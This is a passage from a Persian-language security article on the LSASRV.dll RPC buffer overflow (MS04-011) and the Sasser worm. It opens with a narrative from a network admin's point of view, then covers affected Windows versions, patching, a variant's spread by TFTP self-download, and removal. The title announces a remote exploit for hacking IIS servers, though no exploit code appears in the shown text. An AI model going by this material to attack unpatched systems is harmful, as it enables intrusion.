Lsasrv - DLL RPC Buffer Overflow Remote Exploit: Black - Devils B0ys Digital Network Security Group

‫ ﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ‬LSASRV.
dll ‫ﺣﻔﺮﻩ‬
Black_Devils B0ys Digital Network Security Group
‫ﺷﺮﺣﻲ ﺑﺮ ﻧﻔﻮﺫﭘﺬﻳﺮﻱ ﻣﻮﺳﻮﻡ ﺑﻪ‬

Lsasrv.dll RPC buffer overflow remote exploit
Microsoft IIS Servers
C0llect0r ‫ ﻣﺤﺴﻦ ﻣﺤﻤﺪﻱ ﻭ‬: ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ‬
‫ ﺍﻣﻴﺮ ﺣﺴﻴﻦ ﺷﺮﻳﻔﻲ‬: ‫ﺗﺼﺤﻴﺢ‬
۱۳۸۳ ‫ ﺗﻴﺮﻣﺎﻩ‬۲۷ : ‫ﺗﺎﺭﻳﺦ‬
Miicrosoft- eEye - Security Focus- : ‫ﻣﻨﺎﺑﻊ‬
1 www.WebSecurityMgz.com
‫ﺣﻔﺮﻩ ‪ LSASRV.dll‬ﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ‬
‫ﻣﻼﺣﻈﺎﺕ ‪:‬‬
‫ﻻﺯﻡ ﺑﻪ ﺗﺬﮐﺮ ﺍﺳﺖ ﮐﻠﻴﻪ ﻣﻄﺎﻟﺐ ﮔﻔﺘﻪ ﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺻﺮﻓﺎ ﺟﻨﺒﻪ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﺩ‪.‬ﻭ ﻫﺮ ﮔﻮﻧﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻏﻴﺮ ﺁﻣﻮﺯﺷﻲ ﺍﺯ ﺍﻳﻦ ﻣﻄﺎﻟﺐ ﺑﺮ ﻋﻬﺪﻩ ﺧﻮﺩ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻲ ﺑﺎﺷﺪ ﻭ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﻭ‬
‫ﻣﺪﻳﺮﻳﺖ ﺳﺎﻳﺖ ﺍﻣﻨﻴﺖ ﻭﺏ ﻫﻴﭻ ﮔﻮﻧﻪ ﻣﺴﻮﻭﻟﻴﺘﻲ ﺭﺍ ﺩﺭ ﻗﺒﺎﻝ ﺁﻥ ﻋﻬﺪﻩ ﺩﺍﺭ ﻧﻤﻲ ﺑﺎﺷﺪ ‪.‬‬
‫‪2‬‬ ‫‪www.WebSecurityMgz.com‬‬
‫ﻣﻘﺪﻣﻪ ‪:‬‬
‫ﺍﻳﻦ ﻳﮏ ﺩﺍﺳﺘﺎﻥ ﻋﻠﻤﻲ –ﺗﺨﻴﻠﻲ ﻧﻴﺴﺖ‬
‫ﻓﮑﺮ ﻣﻲ ﮐﻨﻢ ﺻﺒﺢ ﺭﻭﺯ ﻳﮑﻲ ﺍﺯ ﺭﻭﺯﻫﺎﻱ ﺍﻭﺍﺳﻂ ﻣﺎ ﻣﻪ ﻣﻴﻼﺩﻱ ﺑﻮﺩ‪ .‬ﻣﻦ ﻣﺜﻞ ﺭﻭﺯﻫﺎﻱ ﺩﻳﮕﺮ ﺩﺭ‬
‫ﺣﺎﻝ ﺗﮑﻤﻴﻞ ﮔﺰﺍﺭﺵ ﺭﻭﺯﺍﻧﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺪﻳﺮ ﺍﻣﻨﻴﺖ ﺷﺒﮑﻪ ﺑﻮﺩﻡ‪ .‬ﺣﺘﻲ ﺯﻣﺎﻥ ﺁﻥ ﺣﺎﺩﺛﻪ ﺧﻮﺏ ﺑﻪ‬
‫ﻳﺎﺩﻡ ﻣﺎﻧﺪﻩ ‪ :‬ﺳﺎﻋﺖ ‪.۱۰:۱۵‬‬
‫ﺑﻪ ﺧﺎﻃﺮ ﺍﻳﻨﮑﻪ ﻣﺠﺒﻮﺭ ﺷﺪﻳﻢ ﺑﺮﺍﻱ ﺑﺮﭘﺎ ﻧﮕﻪ ﺩﺍﺷﺘﻦ ﺳﺮﻭﺭﻫﺎ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺭﻭ ﺑﺎ ‪ Switch‬ﺑﻪ‬
‫ﻃﻮﺭ ﺩﺳﺘﻲ ﺍﺯ ﻣﺪﺍﺭ ﺧﺎﺭﺝ ﮐﻨﻴﻢ ﺍﻟﺒﺘﻪ ﻣﻦ ﻣﻮﻗﻌﻲ ﻣﺘﻮﺟﻪ ﺣﺎﺩﺛﻪ ﺷﺪﻡ ﮐﻪ ﺑﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻲ ﮐﻪ‬
‫ﺧﻮﺩﻡ ﺩﺭ ﺣﺎﻝ ﺗﮑﻤﻴﻞ ﮔﺰﺍﺭﺵ ﺭﻭﺯﺍﻧﻪ ﺑﻮﺩﻡ ﭘﻴﻐﺎﻣﻲ ﻣﺒﻨﻲ ﺑﺮ ‪ Shutdown‬ﺳﻴﺴﺘﻢ ﻇﺮﻑ ﻣﺪﺕ ‪۶۰‬‬
‫ﺛﺎﻧﻴﻪ ﻭ ﺍﻳﻨﮑﻪ ﻓﻮﺭﺍ ﺩﺍﺩﻩ ﻫﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﮐﻨﻴﺪ ﻇﺎﻫﺮ ﺷﺪ ‪ .‬ﺍﻟﺒﺘﻪ ﺑﺎ ﺍﻳﻨﮑﻪ ﻫﻨﻮﺯ ﻧﻤﻲ ﺩﺍﻧﺴﺘﻢ ﭼﻪ ﺍﺗﻔﺎﻗﻲ‬
‫ﺍﻓﺘﺎﺩﻩ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﮑﻪ ﺣﺪﺍﻗﻞ ﺯﺣﻤﺎﺗﻲ ﮐﻪ ﺑﺮﺍﻱ ﺁﻥ ﮔﺰﺍﺭﺵ ‪ ۳‬ﺻﻔﺤﻪ ﺍﻱ ﺑﻠﻨﺪ ﮐﺸﻴﺪﻩ ﺑﻮﺩﻡ ﺑﻪ ﻫﺪﺭ‬
‫ﻧﺮﻭﺩ ﺑﻪ ﺟﺎﻱ ﺩﺳﺖ ﭘﺎﭼﻪ ﺷﺪﻥ ﺑﻪ ﺧﻮﺩﻡ ﮔﻔﺘﻢ ﺍﻳﻦ ﭘﻴﻐﺎﻡ ﺑﻪ ﺧﺎﻃﺮ ﻫﺮ ﻋﻠﺘﻲ ﮐﻪ ﺁﻣﺪﻩ ﺑﺎﺷﺪ ﻭ ﻫﺮ‬
‫ﭼﻪ ﺑﺎﺷﺪ ﺷﺒﻴﻪ ‪ Shutdown‬ﮐﺮﺩﻥ ﺍﺯ ﺭﻭﻱ ﺳﻄﺮ ﻓﺮﻣﺎﻥ ﻫﺴﺖ! ﮐﻪ ﺑﺎ ﻓﺮﻣﺎﻥ ﺩﻳﮕﺮﻱ ﻣﻲ ﺷﻮﺩ ﺁﻥ‬
‫ﺭﺍ ﻟﻐﻮ ﻛﺮﺩ‪.‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻪ ‪ Run‬ﺭﻓﺘﻢ ﻭ ﺑﺎ ﺩﺳﺘﻮ ﺭ ‪ Shutdown /a‬ﺑﻪ ﻃﻮﺭ ﻣﻮﻗﺖ ﺍﺯ ﺧﺎﻣﻮﺵ‬
‫ﺷﺪﻥ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﮐﺮﺩﻡ‬
‫ﻭﻟﻲ ﻣﻲ ﺩﺍﻧﺴﺘﻢ ﺍﻳﻦ ﺭﺍﻩ ﺣﻞ ﺍﺳﺎﺳﻲ ﻧﻴﺴﺖ ﻭﻣﺸﮑﻞ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﺍﻳﻦ ﭼﻴﺰﻫﺎﺳﺖ ﻭ ﺣﺘﻤﺎ ﺍﻳﻦ‬
‫ﻣﻮﺿﻮﻉ ﻋﻠﺖ ﺩﻳﮕﻪ ﺍﻱ ﭘﺸﺘﺶ ﻫﺴﺖ ‪. .‬ﻣﻮﺿﻮﻉ ﻣﻮﻗﻌﻲ ﺑﺮﺍﻳﻢ ﺭﻭﺷﻦ ﺗﺮﻭ ﺟﺪﻱ ﺗﺮ ﺷﺪ ﻭﻗﺘﻲ ﮐﻪ‬
‫ﺑﺨﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺎ ﺗﻤﺎﺱ ﺑﺎ ﻣﻦ ﺍﻋﻼﻡ ﮐﺮﺩﻧﺪ ﺑﻴﺸﺘﺮ ﮐﺎﺭﺑﺮﺍﻥ ﺷﺒﮑﻪ ﻣﺎ ﺩﭼﺎﺭ ﻫﻤﻴﻦ ﻣﺸﮑﻞ ﺷﺪﻧﺪ‬
‫ﻭﻧﻤﻴﺪﻭﻧﻨﺪ ﺑﺎﻳﺪ ﭼﻪ ﮐﺎﺭ ﮐﻨﻨﺪ ‪.‬ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺭﺍ ﻫﻢ ﺑﮕﻮﻳﻢ ﮐﻪ ﺁﻥ ﻣﻮ ﻗﻊ ﻣﻦ ﻫﻢ ﻧﻤﻲ ﺩﺍﻧﺴﺘﻢ ﻋﻠﺖ ﺍﻳﻦ‬
‫ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﭼﻪ ﭼﻴﺰﻱ ﻫﺴﺖ ‪..‬ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺧﺎﻃﺮ ‪ Down‬ﮐﺮﺩﻥ ﭼﻨﺪ ﺗﺎ ﺍﺯ ﺳﺮﻭﺭﻫﺎ ﺑﺎﺭﻩ‬
‫ﮐﺎﺭﻱ ﺭﻭﻱ ﺩﻳﮕﺮ ﺳﺮﻭﺭﻫﺎ ﺑﺎﻻ ﺭﻓﺘﻪ ﺑﻮﺩ ﻭ ﺷﺒﮑﻪ ﺧﻴﻠﻲ ﮐﻨﺪ ﺷﺪﻩ ﺑﻮﺩ ﻣﻦ ﺍﻭﻝ ﻓﮑﺮ ﮐﺮﺩﻡ ﻣﺎ ﺑﺎ ﻳﮏ‬
‫ﺣﻤﻠﻪ )‪ Disterbuted Denial of Services (DDoS‬ﻣﻮﺍﺟﻪ ﺷﺪﻳﻢ ﺑﻌﺪﺍ ﻓﻬﻤﻴﺪﻡ ﺍﻥ ﻫﻤﻪ ﻣﺸﮑﻞ‬
‫ﭘﻴﺶ ﺍﻭﻣﺪﻩ ﺑﻪ ﺧﺎﻃﺮ ﻳﮏ ‪ Worm‬ﺟﺪﻳﺪ ﺑﻮﺩ ‪.‬‬
‫ﺑﻠﻪ ﺩﻭﺳﺘﺎﻥ ﺩﺭﺳﺖ ﺣﺪﺱ ﺯﺩﻳﺪ ‪ Worm Sasser‬ﺣﺘﻤﺎ ﺷﻤﺎ ﻫﻢ ﺑﺎ ﺍﻳﻦ ﺩﻭﺳﺖ ‪ ۱۵‬ﮐﻴﻠﻮ ﺑﺎﻳﺘﻲ‬
‫ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﮐﺮﺩﻳﺪ ﺍﻟﺒﺘﻪ ﻣﻦ ﻭ ﺩﻭﺳﺘﺎﻧﻢ ﻗﺼﺪ ﻧﺪﺍﺭﻳﻢ ﺩﺭ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺑﻪ ﻃﻮﺭ ﮐﺎﻣﻞ ﺳﺎﺧﺘﺎﺭ ﻭ‬
‫ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﮑﺮﺩ ﺍﻧﻮﺍﻉ ﺍﻳﻦ ﮐﺮﻡ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻭ ﺑﺮﺍﻱ ﺷﻤﺎ ﺷﺮﺡ ﺑﺪﻳﻢ ﻓﻘﻂ ﺍﺷﺎﺭﻫﺎﻱ ﮐﻮﺗﺎﻩ ﺑﻪ ﺍﻭﻥ‬
‫ﻣﻲ ﮐﻨﻢ ‪.‬ﺩﺭ ﺁﻥ ﺭﻭﺯﻫﺎ ﺍﻋﻼﻡ ﺷﺪ ﮐﻪ ﺍﻳﻦ ﮐﺮﻡ ﺍﺯ ﻳﮏ ﺍﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺩﺭ ﭘﺮﻭﺳﻪ ‪ Lsass.exe‬ﺑﺮﺍﻱ‬
‫ﻧﻔﻮﺫ ﻭ ﮔﺴﺘﺮﺵ ﺧﻮﺩﺵ ﺑﺮ ﺭﻭﻱ ﺷﺒﮑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﺪ ﻣﻦ ﺑﺎ ﺷﻨﻴﺪﻥ ﺍﻳﻦ ﺧﺒﺮﻣﺒﻨﻲ ﻭﺟﻮﺩ ﺣﻔﺮﻩ‬
‫ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﺑﻪ ﻳﺎﺩ ﻳﮏ ﮔﺮﺍﺭﺵ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻥ ﮔﺮﻭﻩ ﺍﻣﻨﻴﺘﻲ ‪ eEye‬ﺍﻓﺘﺎﺩﻡ‪.‬‬
‫ﺁﻧﻬﺎ ﺍﻋﻼﻡ ﮐﺮﺩﻩ ﺑﻮﺩﻧﺪ ﮐﻪ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ‪ lsasrv.dll‬ﮐﻪ ﺗﻮﺳﻂ ‪ lsass.exe‬ﻣﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ ﻭ ﺑﺎ ‪ Buffer Overflow‬ﮐﺮﺩﻥ ﺁﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺧﻄﺮ‬
‫ﺑﻴﻨﺪﺍﺯﻧﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻫﻢ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻫﺸﺪﺍﺭ ‪ eEye‬ﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ ﭘﭻ ﻫﺎﻱ ﻫﻤﺎﻥ ﺣﻔﺮﻩ ﺭﺍ‬
‫ﺑﻪ ﺯﻭﺩﻱ ﻣﻨﺘﺸﺮ ﮐﺮﺩ ‪ .‬ﺑﺎ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻡ ﮐﻪ ﺍﻳﻦ ﺟﻮﺍﻧﺎﻥ ﻫﮑﺮ ﺁﻟﻤﺎﻧﻲ ) ﮔﺮﻭﻩ‬
‫‪ ( NetSky‬ﺣﺘﻤﺎ ﺍﺯ ﻫﻤﻴﻦ ﺣﻔﺮﻩ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﮐﺮﻡ ‪ sasser‬ﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩﻩ ﺍﻧﺪ ﻭﻟﻲ ﺩﺍﺳﺘﺎﻥ‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺟﺎ ﺧﺘﻢ ﻧﻤﻲ ﺷﺪ‪ .‬ﺑﺎ ﺗﺠﺮﺑﻪ ﺍﻱ ﮐﻪ ﺩﺭ ﺍﻳﻦ ﺳﺎﻝ ﻫﺎ ﺩﺍﺷﺘﻢ ﺑﻪ ﺧﻮﺩﻡ ﮔﻔﺘﻢ ﭘﺸﺖ ﻫﺮ ﮐﺮﻣﻲ‬
‫ﺣﻔﺮﻩ ﺍﻱ ﺍﺳﺖ ﻭ ﭘﺸﺖ ﻫﺮ ﺣﻔﺮﻩ ﺍﻱ ‪ Exploit‬ﺍﻱ ﻫﻢ ﻫﺴﺖ‪ .‬ﺑﺮﺍﻱ ﻫﮏ ﮐﺮﺩﻥ ﺍﺯ ﺁﻧﺠﺎ ﮐﻪ ﻫﮑﺮﻫﺎ‬
‫ﺍﺯ ﻫﺮ ﺣﻔﺮﻩ ﺟﺪﻳﺪﻱ ﺣﺪﺍﮐﺜﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﻣﻲ ﮐﻨﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺟﺎ ﮐﻪ ﻋﻤﺮ ﺍﻳﻦ ﮐﺮﻡ ﻫﻨﻮﺯ ﻫﻢ ﺑﻪ ﻳﮏ ﺳﺎﻝ‬
‫ﻧﺮﺳﻴﺪﻩ ﺑﻮﺩ ﻭ ‪ ۴-۳‬ﻣﺎﻩ ﮐﻪ ﺍﺯ ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﻣﻲ ﮔﺬﺭﺩ ﭘﺲ ﺣﺘﻤﺎ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍﻩ ﻧﻔﻮﺫ ﺑﻪ ﺷﺒﮑﻪ‬
‫ﻫﺎ ﺩﺭ ﭼﻨﺪ ﻣﺎﻩ ﺁﻳﻨﺪﻩ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺎﺷﺪ ‪.‬‬
‫ﺑﺎ ﮐﻨﺠﮑﺎﻭﻱ ﻣﻦ ﻭ ﻳﮏ ﺳﺮﻱ ﺍﺯ ﺩﻭﺳﺘﺎﻧﻢ ﻳﻪ ﺷﻴﻮﻩ ﺟﺪﻳﺪﻱ ﺍﺯ ﻫﮏ ﺳﺮﻭﺭﻫﺎﻱ ‪Microsoft IIS‬‬

‫‪ Server‬ﭘﻲ ﺑﺮﺩﻳﻢ‬
‫ﮐﻪ ﻣﺸﻬﻮﺭ ﺷﺪﻩ ﺑﻪ ﺣﻔﺮﻩ ‪ lsass‬ﻭ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﭘﭻ ﻧﺸﺪﻩ ﺑﺎ ‪ Microsoft KB835732‬ﮐﻪ ﺩﺭ‬
‫ﺑﻮﻟﺘﻦ ﺧﺒﺮﻱ ﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ ﺑﺎ ﺷﻤﺎﺭﻩ ‪ MS04-11‬ﺷﺎﻣﻞ – )‪Win NT- WinXP(SP0-SP1‬‬
‫‪Win2k(SP1-SP4)-‬‬
‫‪ Win Server 2003‬ﺩﺭ ﻧﺴﺨﻪ ﻫﺎﻱ ‪ ۳۲‬ﻭ ‪ ۶۴‬ﺑﻴﺖ ﺑﺎ ﺍﻳﻦ ﺍﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻗﺎﻳﻞ ﻧﻔﻮﺫ ﻫﺴﺘﻨﺪ ﺍﻟﺒﺘﻪ‬
‫ﺷﻤﺎ ﺑﺎ ﻧﺼﺐ ﭘﭻ ﻫﺎﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺑﺮﺍﻱ ﺍﻳﻦ ﺣﻔﺮﻩ ﻳﺎ ﺑﺎ ﺍﺭﺗﻘﺎﻱ ﺳﺮﻭﻳﺲ ﭘﮏ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺑﻪ‬
‫‪ Service Pack v2‬ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﺮ ﮔﻮﻧﻪ ﺣﻤﻠﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻦ ﺣﻔﺮﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺧﻮﺩ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺑﻪ ﻋﻤﻞ ﺁﻭﺭﻳﺪ ‪.‬‬
‫ﺩﺭ ﺍﺑﺘﺪﺍ ﻗﺼﺪ ﺩﺍﺭﻡ ﺷﻤﺎ ﺭﺍ ﻣﻘﺪﺍﺭﻱ ﺑﺎ ﺳﺎﺧﺘﺎﺭ ﻋﻤﻠﮑﺮﺩ ﺍﻳﻦ ﮐﺮﻡ ﺍﺷﻨﺎ ﮐﻨﻢ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﺭﺍﺣﺘﻲ‬
‫ﺭﺍ ﺩﺭﮎ ﮐﻨﻴﺪ ﻫﻤﺎﻧﻄﻮﺭ ﮐﻪ ﺷﺎﻳﺪ ﻗﺒﻼ ﺑﺎ ﺍﻳﻦ ﮐﺮﻡ ﺍﺷﻨﺎ ﺷﺪﻩ ﺑﺎﺷﻴﺪ ﺍﻳﻦ ﮐﺮﻡ‬ ‫ﻧﺤﻮﻩ ﮐﺎﺭ ‪Exploit‬‬
‫ﺑﻌﺪ ﺍﺯ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﻴﻐﺎﻣﻲ ﻣﺒﻨﻲ ﺑﺮ ‪ Shutdown‬ﺳﻴﺴﺘﻢ ﻇﺮﻑ ﻣﺪﺕ ‪ ۶۰‬ﺛﺎﻳﻨﻪ ﻧﻤﺎﻳﺶ‬
‫ﻣﻲ ﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﺍﻏﻠﺐ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﮐﺮﻡ ﺑﺎ ﮐﺮﻡ ﻣﻌﺮﻭﻑ ‪ MS Blaster‬ﻭ ‪ Lovesan‬ﺍﺷﺘﺒﺎﻩ ﮔﺮﻓﺘﻪ ﻣﻲ ﺷﻮﺩ ﻭﻟﻲ‬
‫ﺑﺮﺍﺣﺘﻲ ﺍﺯ ﺭﻭﻱ ﻫﻤﻴﻦ ﭘﻴﻐﺎﻡ ﻣﻲ ﺷﻮﺩ ﺑﻪ ﺗﻔﺎﻭﺗﺸﺎﻥ ﭘﻲ ﺑﺮﺩ ﺍﻟﺒﺘﻪ ﺟﺎﻟﺐ ﺍﺳﺖ ﺑﺪﺍﻧﻴﺪ ﻧﺴﺨﻪ ﻫﺎﻳﻲ‬
‫ﺍﺯ ﺍﻳﻦ ﮐﺮﻡ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻩ ﺍﺳﺖ ﮐﻪ ﺍﺯ ﻧﻈﺮ ‪ Source Code‬ﺗﻔﺎﻭﺕ ﭼﻨﺪﺍﻧﻲ ﺑﺎ ‪ sasser‬ﻧﺪﺍﺭﻧﺪ‬
‫ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺷﮑﻞ ﻇﺎﻫﺮﻱ ﺑﺎ ﺁﻥ ﻓﺮﻕ ﺩﺍﺭﺩ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﻧﺤﻮﻩ ﻱ ﮔﺴﺘﺮﺵ ﻭ ﻋﻤﻠﮑﺮﺩ ﺩﺭ ﺩﺍﺧﻞ‬
‫ﺳﻴﺴﺘﻢ ﻧﻴﺰ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪ .‬ﻣﺜﻼ ﮐﺮﻣﻲ ﺗﻮﺳﻂ ﻓﺮﺩﻱ ﺑﻪ ﻧﺎﻡ ‪ Alias cyclone‬ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‬
‫ﻫﻤﭽﻨﻴﻦ ﺍﻳﻦ ﻓﺮﺩ ﺍﺩﻋﺎ ﮐﺮﺩﻩ ﺍﺳﺖ ﮐﻪ ﻳﮏ ﺍﻳﺮﺍﻧﻲ ﺑﻮﺩﻩ ﻭ ﺍﺯ ﺟﻤﺎﻋﺖ ﻫﮑﺮﻫﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﺍﻳﺮﺍﻧﻲ‬
‫ﮐﻪ ﺩﺍﺭﺍﻱ ﻳﮏ ﻣﻘﺎﻡ ﺳﻴﺎﺳﻲ ﺩﺭ ﺍﻳﺮﺍﻥ ﻣﻲ ﺑﺎﺷﺪ‪ ،‬ﺍﺳﺖ ‪.‬ﺍﻳﻦ ﻛﺮﻡ ﺍﺯ ﻃﺮﻳﻖ ﭘﻮﺭﺕ ‪ TCP45‬ﻭﺍﺭﺩ‬
‫ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺩﺭ ﺻﻮﺭﺕ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﻮﺩﻥ ﺳﻴﺴﺘﻢ ﻳﮏ ﮐﭙﻲ ﺍﺯ ﺧﻮﺩ ﺑﻪ ﻧﺎﻡ ‪CYCLONE.EXE‬‬
‫ﺩﺭ ﺷﺎﺧﻪ ‪ Root‬ﺳﻴﺴﺘﻢ‬
‫‪ Download‬ﻣﻲ ﮐﻨﺪ ﺯﻣﺎﻥ ﺍﻳﻦ ﮐﺮﻡ ﻗﺎﺩﺭ ﺑﻪ ﺣﻤﻠﻪ ﺍﺳﺖ ﮐﻪ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ‪ TFTP.EXE‬ﺩﺭ‬
‫ﻫﺪﻑ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﺪ ﺳﭙﺲ ﺍﻳﻦ ﮐﺮﻡ ﺣﻤﻠﻪ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﮐﺮﺩﻩ ﻭ ﭘﺮﻭﺳﻪ ‪ Lsass.exe‬ﺭﺍ ﮐﻪ‬
‫ﺭﻭﻳﻪ ﺍﻣﻨﻴﺘﻲ ﺍﮐﺎﻧﺖ ﻫﺎ ﺑﻪ ﺁﻥ ﮐﻨﺘﺮﻝ ﻣﻲ ﺷﻮﻧﺪ ﺭﺍ ﺍﺯ ﮐﺎﺭ ﻣﻲ ﺍﻧﺪﺍﺯﺩ‪.‬ﻫﻤﭽﻨﻴﻦ ﺭﻭﺵ ﮐﺎﺭ‬

‫‪ Svchost.exe‬ﺍﺳﺖ ﮐﻪ ﺍﮔﺮ ﺧﻠﻠﻲ ﺩﺭ ﮐﺎﺭ ﺍﻥ ﺍﻳﺠﺎﺩ ﮔﺮﺩﺩ ﺑﺎﻋﺚ‬ ‫‪ Lsass.exe‬ﺷﺒﻴﻪ ﭘﺮﻭﺳﻪ‬
‫‪ Restart‬ﺳﻴﺴﺘﻢ ﻣﻲ ﺷﻮﺩ ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻧﺤﻮﻩ ‪ removal‬ﺍﻳﻦ ﮐﺮﻡ ﺭﺍ ﺍﺯ ﺍﺩﺭﺱ ﺯﻳﺮ ﺑﺪﺳﺖ‬
‫ﺍﻭﺭﻳﺪ‬
‫‪http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx.‬‬
‫ﺍﻟﺒﺘﻪ ﻓﺮﺍﻳﻨﺪ ‪ Removal‬ﺍﻳﻦ ﻛﺮﻡ ﻓﻘﻂ ﺩﺭ ﺣﺎﻟﺖ ‪ safe mode‬ﺍﻣﮑﺎﻥ ﭘﺬﻳﺮ ﺍﺳﺖ ﺍﻟﺒﺘﻪ ‪remove‬‬
‫ﮐﺮﺩﻥ ﺍﻳﻦ ﻛﺮﻡ ﺟﺪﻳﺪ ﺍﻣﮑﺎﻥ ﮐﻤﻲ ﻛﺎﺭ ﺩﺍﺭﺩ ﺯﻳﺮﺍ ﺑﺎﻋﺚ ﺍﺯ ﮐﺎﺭ ﺍﻓﺘﺎﺩﻥ ﺩﺳﺘﻮﺭﺍﺕ ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﻗﺒﻴﻞ‬
‫‪ msconfig‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﮐﺎﺭﺍﻓﺘﺎﺩﻥ ﻓﺎﻳﺮﻭﺍﻟﻬﺎ ﻭﻋﻤﻞ ﻧﮑﺮﺩﻥ ﺍﻧﺘﻲ ﻭﻳﺮﻭﺱ ﻫﺎﻳﻲ ﭼﻮﻥ ‪Norton‬‬
‫ﻣﻲ ﺷﻮﺩ ﮐﻪ ‪ removal‬ﮐﺮﺩﻥ ﺍﻳﻦ ﮐﺮﻡ ﺭﺍ ﺳﺨﺖ ﻣﻲ ﮐﻨﺪ ﻭ ﻣﻦ ﻧﻴﺰ ﻫﻤﺎﻧﻨﺪ ﻣﺘﺨﺼﺼﺎﻥ ﺑﺨﺶ‬
‫ﺍﻣﻨﻴﺖ ﮔﺮﻭﻩ ‪ Security Focus‬ﻣﻌﺘﻘﺪﻡ ﮐﻪ ﺗﻨﻬﺎ ﺭﺍ ﺭﺍﺣﺖ ﺷﺪﻥ ﺍﺯ ﺩﺳﺖ ﺍﻳﻦ ﮐﺮﻡ ﻧﺼﺐ ﻣﺠﺪﺩ‬
‫ﻭﻳﻨﺪﻭﺯ ﻭ ‪Patch‬ﮐﺮﺩﻥ ﺣﻔﺮﻩ ﻫﺎﻱ ﻣﺮﺑﻮﻃﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺿﻤﻦ ﻫﻴﭻ ﺁﻧﺘﻲ ﻭﻳﺮﻭﺳﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﺯ ﺑﻴﻦ‬
